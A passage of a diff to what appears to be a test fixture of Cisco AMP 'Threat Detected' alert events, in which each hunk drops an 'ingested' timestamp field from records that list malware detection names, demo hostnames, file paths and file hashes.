Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "severity": 2 @@ -2460,7 +2432,6 @@ ], "code": "1090519054", "id": "6176258981346935000", - "ingested": "2022-02-02T05:52:33.422899596Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -2540,7 +2511,6 @@ ], "code": "1090519054", "id": "6176258929807327000", - "ingested": "2022-02-02T05:52:33.422900627Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -2620,7 +2590,6 @@ ], "code": "1090519054", "id": "6533668103677542000", - "ingested": "2022-02-02T05:52:33.422901438Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2710,7 +2679,6 @@ ], "code": "1090519054", "id": "6533668103677542000", - "ingested": "2022-02-02T05:52:33.422902321Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2796,7 +2764,6 @@ ], "code": "1090519054", "id": "6533668103677542000", - "ingested": "2022-02-02T05:52:33.422903227Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2886,7 +2853,6 @@ ], "code": "1090519054", "id": "6533667841684537000", - "ingested": "2022-02-02T05:52:33.422904047Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2976,7 +2942,6 @@ ], "code": "1090519054", "id": "6533667841684537000", - "ingested": "2022-02-02T05:52:33.422904991Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3062,7 +3027,6 @@ ], "code": "1090519054", "id": "6533667841684537000", - "ingested": "2022-02-02T05:52:33.422905820Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3152,7 +3116,6 @@ ], "code": "1090519054", "id": "6176258118058508000", - "ingested": "2022-02-02T05:52:33.422906632Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -3232,7 +3195,6 @@ ], "code": "1090519054", "id": "6533667837389570000", - "ingested": "2022-02-02T05:52:33.422907434Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3318,7 +3280,6 @@ ], "code": "1090519054", "id": "6176258066518901000", - "ingested": "2022-02-02T05:52:33.422908253Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -3398,7 +3359,6 @@ ], "code": "1090519054", "id": "6176258014979293000", - "ingested": "2022-02-02T05:52:33.422909081Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -3478,7 +3438,6 @@ ], "code": "1090519054", "id": "6176257963439686000", - "ingested": "2022-02-02T05:52:33.422909890Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -3558,7 +3517,6 @@ ], "code": "1090519054", "id": "6533667579691532000", - "ingested": "2022-02-02T05:52:33.422910706Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3648,7 +3606,6 @@ ], "code": "1090519054", "id": "6533667579691532000", - "ingested": "2022-02-02T05:52:33.422911517Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3734,7 +3691,6 @@ ], "code": "1090519054", "id": "6533667579691532000", - "ingested": "2022-02-02T05:52:33.422912323Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat 